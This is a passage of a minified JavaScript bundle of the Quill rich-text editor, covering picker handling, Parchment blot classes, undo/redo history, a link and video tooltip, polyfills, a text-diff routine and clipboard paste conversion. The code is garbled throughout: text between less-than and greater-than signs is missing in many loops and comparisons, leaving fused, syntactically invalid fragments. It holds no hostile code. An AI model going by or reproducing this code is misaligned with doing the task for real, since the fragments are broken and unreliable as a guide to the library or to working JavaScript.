0!==arguments[1]&&arguments[1],n=this.container.querySelector(".ql-selected");if(e!==n&&(null!=n&&n.classList.remove("ql-selected"),null!=e&&(e.classList.add("ql-selected"),this.select.selectedIndex=[].indexOf.call(e.parentNode.children,e),e.hasAttribute("data-value")?this.label.setAttribute("data-value",e.getAttribute("data-value")):this.label.removeAttribute("data-value"),e.hasAttribute("data-label")?this.label.setAttribute("data-label",e.getAttribute("data-label")):this.label.removeAttribute("data-label"),a))){if("function"===typeof Event)this.select.dispatchEvent(new Event("change"));else if("object"===("undefined"===typeof Event?"undefined":i(Event))){var t=document.createEvent("Event");t.initEvent("change",!0,!0),this.select.dispatchEvent(t)}this.close()}}},{key:"update",value:function(){var e=void 0;if(this.select.selectedIndex>-1){var a=this.container.querySelector(".ql-picker-options").children[this.select.selectedIndex];e=this.select.options[this.select.selectedIndex],this.selectItem(a)}else this.selectItem(null);var n=null!=e&&e!==this.select.querySelector("option[selected]");this.label.classList.toggle("ql-active",n)}}]),e}();a.default=c},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=g(n(0)),t=g(n(5)),r=n(4),o=g(r),s=g(n(16)),l=g(n(25)),u=g(n(24)),c=g(n(35)),d=g(n(6)),h=g(n(22)),p=g(n(7)),m=g(n(55)),f=g(n(42)),v=g(n(23));function g(e){return e&&e.__esModule?e:{default:e}}t.default.register({"blots/block":o.default,"blots/block/embed":r.BlockEmbed,"blots/break":s.default,"blots/container":l.default,"blots/cursor":u.default,"blots/embed":c.default,"blots/inline":d.default,"blots/scroll":h.default,"blots/text":p.default,"modules/clipboard":m.default,"modules/history":f.default,"modules/keyboard":v.default}),i.default.register(o.default,s.default,u.default,d.default,h.default,p.default),a.default=t.default},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(1),t=function(){function e(e){this.domNode=e,this.domNode[i.DATA_KEY]={blot:this}}return Object.defineProperty(e.prototype,"statics",{get:function(){return this.constructor},enumerable:!0,configurable:!0}),e.create=function(e){if(null==this.tagName)throw new i.ParchmentError("Blot definition missing tagName");var a;return Array.isArray(this.tagName)?("string"===typeof e&&(e=e.toUpperCase(),parseInt(e).toString()===e&&(e=parseInt(e))),a="number"===typeof e?document.createElement(this.tagName[e-1]):this.tagName.indexOf(e)>-1?document.createElement(e):document.createElement(this.tagName[0])):a=document.createElement(this.tagName),this.className&&a.classList.add(this.className),a},e.prototype.attach=function(){null!=this.parent&&(this.scroll=this.parent.scroll)},e.prototype.clone=function(){var e=this.domNode.cloneNode(!1);return i.create(e)},e.prototype.detach=function(){null!=this.parent&&this.parent.removeChild(this),delete this.domNode[i.DATA_KEY]},e.prototype.deleteAt=function(e,a){this.isolate(e,a).remove()},e.prototype.formatAt=function(e,a,n,t){var r=this.isolate(e,a);if(null!=i.query(n,i.Scope.BLOT)&&t)r.wrap(n,t);else if(null!=i.query(n,i.Scope.ATTRIBUTE)){var o=i.create(this.statics.scope);r.wrap(o),o.format(n,t)}},e.prototype.insertAt=function(e,a,n){var t=null==n?i.create("text",a):i.create(a,n),r=this.split(e);this.parent.insertBefore(t,r)},e.prototype.insertInto=function(e,a){void 0===a&&(a=null),null!=this.parent&&this.parent.children.remove(this);var n=null;e.children.insertBefore(this,a),null!=a&&(n=a.domNode),this.domNode.parentNode==e.domNode&&this.domNode.nextSibling==n||e.domNode.insertBefore(this.domNode,n),this.parent=e,this.attach()},e.prototype.isolate=function(e,a){var n=this.split(e);return n.split(a),n},e.prototype.length=function(){return 1},e.prototype.offset=function(e){return void 0===e&&(e=this.parent),null==this.parent||this==e?0:this.parent.children.offset(this)+this.parent.offset(e)},e.prototype.optimize=function(e){null!=this.domNode[i.DATA_KEY]&&delete this.domNode[i.DATA_KEY].mutations},e.prototype.remove=function(){null!=this.domNode.parentNode&&this.domNode.parentNode.removeChild(this.domNode),this.detach()},e.prototype.replace=function(e){null!=e.parent&&(e.parent.insertBefore(this,e.next),e.remove())},e.prototype.replaceWith=function(e,a){var n="string"===typeof e?i.create(e,a):e;return n.replace(this),n},e.prototype.split=function(e,a){return 0===e?this:this.next},e.prototype.update=function(e,a){},e.prototype.wrap=function(e,a){var n="string"===typeof e?i.create(e,a):e;return null!=this.parent&&this.parent.insertBefore(n,this.next),n.appendChild(this),n},e.blotName="abstract",e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(12),t=n(32),r=n(33),o=n(1),s=function(){function e(e){this.attributes={},this.domNode=e,this.build()}return e.prototype.attribute=function(e,a){a?e.add(this.domNode,a)&&(null!=e.value(this.domNode)?this.attributes[e.attrName]=e:delete this.attributes[e.attrName]):(e.remove(this.domNode),delete this.attributes[e.attrName])},e.prototype.build=function(){var e=this;this.attributes={};var a=i.default.keys(this.domNode),n=t.default.keys(this.domNode),s=r.default.keys(this.domNode);a.concat(n).concat(s).forEach((function(a){var n=o.query(a,o.Scope.ATTRIBUTE);n instanceof i.default&&(e.attributes[n.attrName]=n)}))},e.prototype.copy=function(e){var a=this;Object.keys(this.attributes).forEach((function(n){var i=a.attributes[n].value(a.domNode);e.format(n,i)}))},e.prototype.move=function(e){var a=this;this.copy(e),Object.keys(this.attributes).forEach((function(e){a.attributes[e].remove(a.domNode)})),this.attributes={}},e.prototype.values=function(){var e=this;return Object.keys(this.attributes).reduce((function(a,n){return a[n]=e.attributes[n].value(e.domNode),a}),{})},e}();a.default=s},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();function t(e,a){return(e.getAttribute("class")||"").split(/\s+/).filter((function(e){return 0===e.indexOf(a+"-")}))}Object.defineProperty(a,"__esModule",{value:!0});var r=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.keys=function(e){return(e.getAttribute("class")||"").split(/\s+/).map((function(e){return e.split("-").slice(0,-1).join("-")}))},a.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(this.remove(e),e.classList.add(this.keyName+"-"+a),!0)},a.prototype.remove=function(e){t(e,this.keyName).forEach((function(a){e.classList.remove(a)})),0===e.classList.length&&e.removeAttribute("class")},a.prototype.value=function(e){var a=(t(e,this.keyName)[0]||"").slice(this.keyName.length+1);return this.canAdd(e,a)?a:""},a}(n(12).default);a.default=r},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();function t(e){var a=e.split("-"),n=a.slice(1).map((function(e){return e[0].toUpperCase()+e.slice(1)})).join("");return a[0]+n}Object.defineProperty(a,"__esModule",{value:!0});var r=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.keys=function(e){return(e.getAttribute("style")||"").split(";").map((function(e){return e.split(":")[0].trim()}))},a.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(e.style[t(this.keyName)]=a,!0)},a.prototype.remove=function(e){e.style[t(this.keyName)]="",e.getAttribute("style")||e.removeAttribute("style")},a.prototype.value=function(e){var a=e.style[t(this.keyName)];return this.canAdd(e,a)?a:""},a}(n(12).default);a.default=r},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(e,a){for(var n=0;ni&&this.stack.undo.length>0){var t=this.stack.undo.pop();n=n.compose(t.undo),e=t.redo.compose(e)}else this.lastRecorded=i;this.stack.undo.push({redo:e,undo:n}),this.stack.undo.length>this.options.maxStack&&this.stack.undo.shift()}}},{key:"redo",value:function(){this.change("redo","undo")}},{key:"transform",value:function(e){this.stack.undo.forEach((function(a){a.undo=e.transform(a.undo,!0),a.redo=e.transform(a.redo,!0)})),this.stack.redo.forEach((function(a){a.undo=e.transform(a.undo,!0),a.redo=e.transform(a.redo,!0)}))}},{key:"undo",value:function(){this.change("undo","redo")}}]),a}(o(n(9)).default);function l(e){var a=e.reduce((function(e,a){return e+=a.delete||0}),0),n=e.length()-a;return function(e){var a=e.ops[e.ops.length-1];return null!=a&&(null!=a.insert?"string"===typeof a.insert&&a.insert.endsWith("\n"):null!=a.attributes&&Object.keys(a.attributes).some((function(e){return null!=t.default.query(e,t.default.Scope.BLOCK)})))}(e)&&(n-=1),n}s.DEFAULTS={delay:1e3,maxStack:100,userOnly:!1},a.default=s,a.getLastChangeIndex=l},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.BaseTooltip=void 0;var i=function(){function e(e,a){for(var n=0;n0&&void 0!==arguments[0]?arguments[0]:"link",a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;this.root.classList.remove("ql-hidden"),this.root.classList.add("ql-editing"),null!=a?this.textbox.value=a:e!==this.root.getAttribute("data-mode")&&(this.textbox.value=""),this.position(this.quill.getBounds(this.quill.selection.savedRange)),this.textbox.select(),this.textbox.setAttribute("placeholder",this.textbox.getAttribute("data-"+e)||""),this.root.setAttribute("data-mode",e)}},{key:"restoreFocus",value:function(){var e=this.quill.scrollingContainer.scrollTop;this.quill.focus(),this.quill.scrollingContainer.scrollTop=e}},{key:"save",value:function(){var e=this.textbox.value;switch(this.root.getAttribute("data-mode")){case"link":var a=this.quill.root.scrollTop;this.linkRange?(this.quill.formatText(this.linkRange,"link",e,s.default.sources.USER),delete this.linkRange):(this.restoreFocus(),this.quill.format("link",e,s.default.sources.USER)),this.quill.root.scrollTop=a;break;case"video":e=function(e){var a=e.match(/^(?:(https?):\/\/)?(?:(?:www|m)\.)?youtube\.com\/watch.*v=([a-zA-Z0-9_-]+)/)||e.match(/^(?:(https?):\/\/)?(?:(?:www|m)\.)?youtu\.be\/([a-zA-Z0-9_-]+)/);return a?(a[1]||"https")+"://www.youtube.com/embed/"+a[2]+"?showinfo=0":(a=e.match(/^(?:(https?):\/\/)?(?:www\.)?vimeo\.com\/(\d+)/))?(a[1]||"https")+"://player.vimeo.com/video/"+a[2]+"/":e}(e);case"formula":if(!e)break;var n=this.quill.getSelection(!0);if(null!=n){var i=n.index+n.length;this.quill.insertEmbed(i,this.root.getAttribute("data-mode"),e,s.default.sources.USER),"formula"===this.root.getAttribute("data-mode")&&this.quill.insertText(i+1," ",s.default.sources.USER),this.quill.setSelection(i+2,s.default.sources.USER)}}this.textbox.value="",this.hide()}}]),a}(p.default);function M(e,a){var n=arguments.length>2&&void 0!==arguments[2]&&arguments[2];a.forEach((function(a){var i=document.createElement("option");a===n?i.setAttribute("selected","selected"):i.setAttribute("value",a),e.appendChild(i)}))}a.BaseTooltip=w,a.default=A},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(){this.head=this.tail=null,this.length=0}return e.prototype.append=function(){for(var e=[],a=0;a1&&this.append.apply(this,e.slice(1))},e.prototype.contains=function(e){for(var a,n=this.iterator();a=n();)if(a===e)return!0;return!1},e.prototype.insertBefore=function(e,a){e&&(e.next=a,null!=a?(e.prev=a.prev,null!=a.prev&&(a.prev.next=e),a.prev=e,a===this.head&&(this.head=e)):null!=this.tail?(this.tail.next=e,e.prev=this.tail,this.tail=e):(e.prev=null,this.head=this.tail=e),this.length+=1)},e.prototype.offset=function(e){for(var a=0,n=this.head;null!=n;){if(n===e)return a;a+=n.length(),n=n.next}return-1},e.prototype.remove=function(e){this.contains(e)&&(null!=e.prev&&(e.prev.next=e.next),null!=e.next&&(e.next.prev=e.prev),e===this.head&&(this.head=e.next),e===this.tail&&(this.tail=e.prev),this.length-=1)},e.prototype.iterator=function(e){return void 0===e&&(e=this.head),function(){var a=e;return null!=e&&(e=e.next),a}},e.prototype.find=function(e,a){void 0===a&&(a=!1);for(var n,i=this.iterator();n=i();){var t=n.length();if(eo?n(i,e-o,Math.min(a,o+l-e)):n(i,0,Math.min(l,e+a-o)),o+=l}},e.prototype.map=function(e){return this.reduce((function(a,n){return a.push(e(n)),a}),[])},e.prototype.reduce=function(e,a){for(var n,i=this.iterator();n=i();)a=e(a,n);return a},e}();a.default=i},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(17),r=n(1),o={attributes:!0,characterData:!0,characterDataOldValue:!0,childList:!0,subtree:!0},s=function(e){function a(a){var n=e.call(this,a)||this;return n.scroll=n,n.observer=new MutationObserver((function(e){n.update(e)})),n.observer.observe(n.domNode,o),n.attach(),n}return i(a,e),a.prototype.detach=function(){e.prototype.detach.call(this),this.observer.disconnect()},a.prototype.deleteAt=function(a,n){this.update(),0===a&&n===this.length()?this.children.forEach((function(e){e.remove()})):e.prototype.deleteAt.call(this,a,n)},a.prototype.formatAt=function(a,n,i,t){this.update(),e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.insertAt=function(a,n,i){this.update(),e.prototype.insertAt.call(this,a,n,i)},a.prototype.optimize=function(a,n){var i=this;void 0===a&&(a=[]),void 0===n&&(n={}),e.prototype.optimize.call(this,n);for(var o=[].slice.call(this.observer.takeRecords());o.length>0;)a.push(o.pop());for(var s=function e(a,n){void 0===n&&(n=!0),null!=a&&a!==i&&null!=a.domNode.parentNode&&(null==a.domNode[r.DATA_KEY].mutations&&(a.domNode[r.DATA_KEY].mutations=[]),n&&e(a.parent))},l=function e(a){null!=a.domNode[r.DATA_KEY]&&null!=a.domNode[r.DATA_KEY].mutations&&(a instanceof t.default&&a.children.forEach(e),a.optimize(n))},u=a,c=0;u.length>0;c+=1){if(c>=100)throw new Error("[Parchment] Maximum optimize iterations reached");for(u.forEach((function(e){var a=r.find(e.target,!0);null!=a&&(a.domNode===e.target&&("childList"===e.type?(s(r.find(e.previousSibling,!1)),[].forEach.call(e.addedNodes,(function(e){var a=r.find(e,!1);s(a,!1),a instanceof t.default&&a.children.forEach((function(e){s(e,!1)}))}))):"attributes"===e.type&&s(a.prev)),s(a))})),this.children.forEach(l),o=(u=[].slice.call(this.observer.takeRecords())).slice();o.length>0;)a.push(o.pop())}},a.prototype.update=function(a,n){var i=this;void 0===n&&(n={}),(a=a||this.observer.takeRecords()).map((function(e){var a=r.find(e.target,!0);return null==a?null:null==a.domNode[r.DATA_KEY].mutations?(a.domNode[r.DATA_KEY].mutations=[e],a):(a.domNode[r.DATA_KEY].mutations.push(e),null)})).forEach((function(e){null!=e&&e!==i&&null!=e.domNode[r.DATA_KEY]&&e.update(e.domNode[r.DATA_KEY].mutations||[],n)})),null!=this.domNode[r.DATA_KEY].mutations&&e.prototype.update.call(this,this.domNode[r.DATA_KEY].mutations,n),this.optimize(a,n)},a.blotName="scroll",a.defaultChild="block",a.scope=r.Scope.BLOCK_BLOT,a.tagName="DIV",a}(t.default);a.default=s},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(18),r=n(1),o=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(n){if(n.tagName!==a.tagName)return e.formats.call(this,n)},a.prototype.format=function(n,i){var r=this;n!==this.statics.blotName||i?e.prototype.format.call(this,n,i):(this.children.forEach((function(e){e instanceof t.default||(e=e.wrap(a.blotName,!0)),r.attributes.copy(e)})),this.unwrap())},a.prototype.formatAt=function(a,n,i,t){null!=this.formats()[i]||r.query(i,r.Scope.ATTRIBUTE)?this.isolate(a,n).format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.optimize=function(n){e.prototype.optimize.call(this,n);var i=this.formats();if(0===Object.keys(i).length)return this.unwrap();var t=this.next;t instanceof a&&t.prev===this&&function(e,a){if(Object.keys(e).length!==Object.keys(a).length)return!1;for(var n in e)if(e[n]!==a[n])return!1;return!0}(i,t.formats())&&(t.moveChildren(this),t.remove())},a.blotName="inline",a.scope=r.Scope.INLINE_BLOT,a.tagName="SPAN",a}(t.default);a.default=o},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(18),r=n(1),o=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(n){var i=r.query(a.blotName).tagName;if(n.tagName!==i)return e.formats.call(this,n)},a.prototype.format=function(n,i){null!=r.query(n,r.Scope.BLOCK)&&(n!==this.statics.blotName||i?e.prototype.format.call(this,n,i):this.replaceWith(a.blotName))},a.prototype.formatAt=function(a,n,i,t){null!=r.query(i,r.Scope.BLOCK)?this.format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.insertAt=function(a,n,i){if(null==i||null!=r.query(n,r.Scope.INLINE))e.prototype.insertAt.call(this,a,n,i);else{var t=this.split(a),o=r.create(n,i);t.parent.insertBefore(o,t)}},a.prototype.update=function(a,n){navigator.userAgent.match(/Trident/)?this.build():e.prototype.update.call(this,a,n)},a.blotName="block",a.scope=r.Scope.BLOCK_BLOT,a.tagName="P",a}(t.default);a.default=o},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=function(e){function a(){return null!==e&&e.apply(this,arguments)||this}return i(a,e),a.formats=function(e){},a.prototype.format=function(a,n){e.prototype.formatAt.call(this,0,this.length(),a,n)},a.prototype.formatAt=function(a,n,i,t){0===a&&n===this.length()?this.format(i,t):e.prototype.formatAt.call(this,a,n,i,t)},a.prototype.formats=function(){return this.statics.formats(this.domNode)},a}(n(19).default);a.default=t},function(e,a,n){"use strict";var i=this&&this.__extends||function(){var e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,a){e.__proto__=a}||function(e,a){for(var n in a)a.hasOwnProperty(n)&&(e[n]=a[n])};return function(a,n){function i(){this.constructor=a}e(a,n),a.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}();Object.defineProperty(a,"__esModule",{value:!0});var t=n(19),r=n(1),o=function(e){function a(a){var n=e.call(this,a)||this;return n.text=n.statics.value(n.domNode),n}return i(a,e),a.create=function(e){return document.createTextNode(e)},a.value=function(e){var a=e.data;return a.normalize&&(a=a.normalize()),a},a.prototype.deleteAt=function(e,a){this.domNode.data=this.text=this.text.slice(0,e)+this.text.slice(e+a)},a.prototype.index=function(e,a){return this.domNode===e?a:-1},a.prototype.insertAt=function(a,n,i){null==i?(this.text=this.text.slice(0,a)+n+this.text.slice(a),this.domNode.data=this.text):e.prototype.insertAt.call(this,a,n,i)},a.prototype.length=function(){return this.text.length},a.prototype.optimize=function(n){e.prototype.optimize.call(this,n),this.text=this.statics.value(this.domNode),0===this.text.length?this.remove():this.next instanceof a&&this.next.prev===this&&(this.insertAt(this.length(),this.next.value()),this.next.remove())},a.prototype.position=function(e,a){return void 0===a&&(a=!1),[this.domNode,e]},a.prototype.split=function(e,a){if(void 0===a&&(a=!1),!a){if(0===e)return this;if(e===this.length())return this.next}var n=r.create(this.domNode.splitText(e));return this.parent.insertBefore(n,this.next),this.text=this.statics.value(this.domNode),n},a.prototype.update=function(e,a){var n=this;e.some((function(e){return"characterData"===e.type&&e.target===n.domNode}))&&(this.text=this.statics.value(this.domNode))},a.prototype.value=function(){return this.text},a.blotName="text",a.scope=r.Scope.INLINE_BLOT,a}(t.default);a.default=o},function(e,a,n){"use strict";var i=document.createElement("div");if(i.classList.toggle("test-class",!1),i.classList.contains("test-class")){var t=DOMTokenList.prototype.toggle;DOMTokenList.prototype.toggle=function(e,a){return arguments.length>1&&!this.contains(e)===!a?a:t.call(this,e)}}String.prototype.startsWith||(String.prototype.startsWith=function(e,a){return a=a||0,this.substr(a,e.length)===e}),String.prototype.endsWith||(String.prototype.endsWith=function(e,a){var n=this.toString();("number"!==typeof a||!isFinite(a)||Math.floor(a)!==a||a>n.length)&&(a=n.length),a-=e.length;var i=n.indexOf(e,a);return-1!==i&&i===a}),Array.prototype.find||Object.defineProperty(Array.prototype,"find",{value:function(e){if(null===this)throw new TypeError("Array.prototype.find called on null or undefined");if("function"!==typeof e)throw new TypeError("predicate must be a function");for(var a,n=Object(this),i=n.length>>>0,t=arguments[1],r=0;ra.length?e:a,u=e.length>a.length?a:e,c=l.indexOf(u);if(-1!=c)return s=[[1,l.substring(0,c)],[0,u],[1,l.substring(c+u.length)]],e.length>a.length&&(s[0][0]=s[2][0]=n),s;if(1==u.length)return[[n,e],[1,a]];var d=function(e,a){var n=e.length>a.length?e:a,i=e.length>a.length?a:e;if(n.length<4||2*i.length=e.length?[i,t,s,l,d]:null}var s,l,u,c,d,h=t(n,i,Math.ceil(n.length/4)),p=t(n,i,Math.ceil(n.length/2));if(!h&&!p)return null;s=p?h&&h[4].length>p[4].length?h:p:h,e.length>a.length?(l=s[0],u=s[1],c=s[2],d=s[3]):(c=s[0],d=s[1],l=s[2],u=s[3]);var m=s[4];return[l,u,c,d,m]}(e,a);if(d){var h=d[0],p=d[1],m=d[2],f=d[3],v=d[4],g=i(h,m),b=i(p,f);return g.concat([[0,v]],b)}return function(e,a){for(var i=e.length,r=a.length,o=Math.ceil((i+r)/2),s=o,l=2*o,u=new Array(l),c=new Array(l),d=0;di)f+=2;else if(x>r)m+=2;else if(p&&(w=s+h-k)>=0&&w=(A=i-c[w]))return t(e,a,j,x)}for(var S=-b+v;S<=b-g;S+=2){for(var A,w=s+S,M=(A=S==-b||S!=b&&c[w-1]i)g+=2;else if(M>r)v+=2;else if(!p){var j;if((y=s+h-S)>=0&&y=(A=i-A))return t(e,a,j,x)}}}return[[n,e],[1,a]]}(e,a)}(e=e.substring(0,e.length-c),a=a.substring(0,a.length-c));return d&&p.unshift([0,d]),h&&p.push([0,h]),s(p),null!=l&&(p=function(e,a){var i=function(e,a){if(0===a)return[0,e];for(var i=0,t=0;t0&&t.splice(r+2,0,[s[0],l]),u(t,r,3)}return e}(p,l)),p=function(e){for(var a=!1,i=function(e){return e.charCodeAt(0)>=56320&&e.charCodeAt(0)<=57343},t=function(e){return e.charCodeAt(e.length-1)>=55296&&e.charCodeAt(e.length-1)<=56319},r=2;r0&&o.push(e[r]);return o}(p)}function t(e,a,n,t){var r=e.substring(0,n),o=a.substring(0,t),s=e.substring(n),l=a.substring(t),u=i(r,o),c=i(s,l);return u.concat(c)}function r(e,a){if(!e||!a||e.charAt(0)!=a.charAt(0))return 0;for(var n=0,i=Math.min(e.length,a.length),t=i,r=0;n1?(0!==t&&0!==l&&(0!==(a=r(c,u))&&(i-t-l>0&&0==e[i-t-l-1][0]?e[i-t-l-1][1]+=c.substring(0,a):(e.splice(0,0,[0,c.substring(0,a)]),i++),c=c.substring(a),u=u.substring(a)),0!==(a=o(c,u))&&(e[i][1]=c.substring(c.length-a)+e[i][1],c=c.substring(0,c.length-a),u=u.substring(0,u.length-a))),0===t?e.splice(i-l,t+l,[1,c]):0===l?e.splice(i-t,t+l,[n,u]):e.splice(i-t-l,t+l,[n,u],[1,c]),i=i-t-l+(t?1:0)+(l?1:0)+1):0!==i&&0==e[i-1][0]?(e[i-1][1]+=e[i][1],e.splice(i,1)):i++,l=0,t=0,u="",c=""}""===e[e.length-1][1]&&e.pop();var d=!1;for(i=1;i=0&&i>=a-1;i--)if(i+1=700)&&(n.bold=!0),Object.keys(n).length>0&&(a=C(a,n)),parseFloat(i.textIndent||0)>0&&(a=(new s.default).insert("\t").concat(a)),a}],["li",function(e,a){var n=l.default.query(e);if(null==n||"list-item"!==n.blotName||!B(a,"\n"))return a;for(var i=-1,t=e.parentNode;!t.classList.contains("ql-clipboard");)"list"===(l.default.query(t)||{}).blotName&&(i+=1),t=t.parentNode;return i<=0?a:a.compose((new s.default).retain(a.length()-1).retain(1,{indent:i}))}],["b",z.bind(z,"bold")],["i",z.bind(z,"italic")],["style",function(){return new s.default}]],w=[h.AlignAttribute,v.DirectionAttribute].reduce((function(e,a){return e[a.keyName]=a,e}),{}),M=[h.AlignStyle,p.BackgroundStyle,f.ColorStyle,v.DirectionStyle,g.FontStyle,b.SizeStyle].reduce((function(e,a){return e[a.keyName]=a,e}),{}),j=function(e){function a(e,n){!function(e,a){if(!(e instanceof a))throw new TypeError("Cannot call a class as a function")}(this,a);var i=function(e,a){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!a||"object"!==typeof a&&"function"!==typeof a?e:a}(this,(a.__proto__||Object.getPrototypeOf(a)).call(this,e,n));return i.quill.root.addEventListener("paste",i.onPaste.bind(i)),i.container=i.quill.addContainer("ql-clipboard"),i.container.setAttribute("contenteditable",!0),i.container.setAttribute("tabindex",-1),i.matchers=[],A.concat(i.options.matchers).forEach((function(e){var a=t(e,2),r=a[0],o=a[1];(n.matchVisual||o!==K)&&i.addMatcher(r,o)})),i}return function(e,a){if("function"!==typeof a&&null!==a)throw new TypeError("Super expression must either be null or a function, not "+typeof a);e.prototype=Object.create(a&&a.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),a&&(Object.setPrototypeOf?Object.setPrototypeOf(e,a):e.__proto__=a)}(a,e),r(a,[{key:"addMatcher",value:function(e,a){this.matchers.push([e,a])}},{key:"convert",value:function(e){if("string"===typeof e)return this.container.innerHTML=e.replace(/\>\r?\n +\<"),this.convert();var a=this.quill.getFormat(this.quill.selection.savedRange.index);if(a[m.default.blotName]){var n=this.container.innerText;return this.container.innerHTML="",(new s.default).insert(n,y({},m.default.blotName,a[m.default.blotName]))}var i=this.prepareMatching(),r=t(i,2),o=r[0],l=r[1],u=L(this.container,o,l);return B(u,"\n")&&null==u.ops[u.ops.length-1].attributes&&(u=u.compose((new s.default).retain(u.length()-1).delete(1))),x.log("convert",this.container.innerHTML,u),this.container.innerHTML="",u}},{key:"dangerouslyPasteHTML",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:u.default.sources.API;if("string"===typeof e)this.quill.setContents(this.convert(e),a),this.quill.setSelection(0,u.default.sources.SILENT);else{var i=this.convert(a);this.quill.updateContents((new s.default).retain(e).concat(i),n),this.quill.setSelection(e+i.length(),u.default.sources.SILENT)}}},{key:"onPaste",value:function(e){var a=this;if(!e.defaultPrevented&&this.quill.isEnabled()){var n=this.quill.getSelection(),i=(new s.default).retain(n.index),t=this.quill.scrollingContainer.scrollTop;this.container.focus(),this.quill.selection.update(u.default.sources.SILENT),setTimeout((function(){i=i.concat(a.convert()).delete(n.length),a.quill.updateContents(i,u.default.sources.USER),a.quill.setSelection(i.length()-n.length,u.default.sources.SILENT),a.quill.scrollingContainer.scrollTop=t,a.quill.focus()}),1)}}},{key:"prepareMatching",value:function(){var e=this,a=[],n=[];return this.matchers.forEach((function(i){var r=t(i,2),o=r[0],s=r[1];switch(o){case Node.TEXT_NODE:n.push(s);break;case Node.ELEMENT_NODE:a.push(s);break;default:[].forEach.call(e.container.querySelectorAll(o),(function(e){e[S]=e[S]||[],e[S].push(s)}))}})),[a,n]}}]),a}(d.default);function C(e,a,n){return"object"===("undefined"===typeof a?"undefined":i(a))?Object.keys(a).reduce((function(e,n){return C(e,n,a[n])}),e):e.reduce((function(e,i){return i.attributes&&i.attributes[a]?e.push(i):e.insert(i.insert,(0,o.default)({},y({},a,n),i.attributes))}),new s.default)}function P(e){if(e.nodeType!==Node.ELEMENT_NODE)return{};var a="__ql-computed-style";return e[a]||(e[a]=window.getComputedStyle(e))}function B(e,a){for(var n="",i=e.ops.length-1;i>=0&&n.length-1}function L(e,a,n){return e.nodeType===e.TEXT_NODE?n.reduce((function(a,n){return n(e,a)}),new s.default):e.nodeType===e.ELEMENT_NODE?[].reduce.call(e.childNodes||[],(function(i,t){var r=L(t,a,n);return t.nodeType===e.ELEMENT_NODE&&(r=a.reduce((function(e,a){return a(t,e)}),r),r=(t[S]||[]).reduce((function(e,a){return a(t,e)}),r)),i.concat(r)}),new s.default):new s.default}function z(e,a,n){return C(n,e,!0)}function N(e,a){var n=l.default.Attributor.Attribute.keys(e),i=l.default.Attributor.Class.keys(e),t=l.default.Attributor.Style.keys(e),r={};return n.concat(i).concat(t).forEach((function(a){var n=l.default.query(a,l.default.Scope.ATTRIBUTE);null!=n&&(r[n.attrName]=n.value(e),r[n.attrName])||(null==(n=w[a])||n.attrName!==a&&n.keyName!==a||(r[n.attrName]=n.value(e)||void 0),null==(n=M[a])||n.attrName!==a&&n.keyName!==a||(n=M[a],r[n.attrName]=n.value(e)||void 0))})),Object.keys(r).length>0&&(a=C(a,r)),a}function E(e,a){var n=l.default.query(e);if(null==n)return a;if(n.prototype instanceof 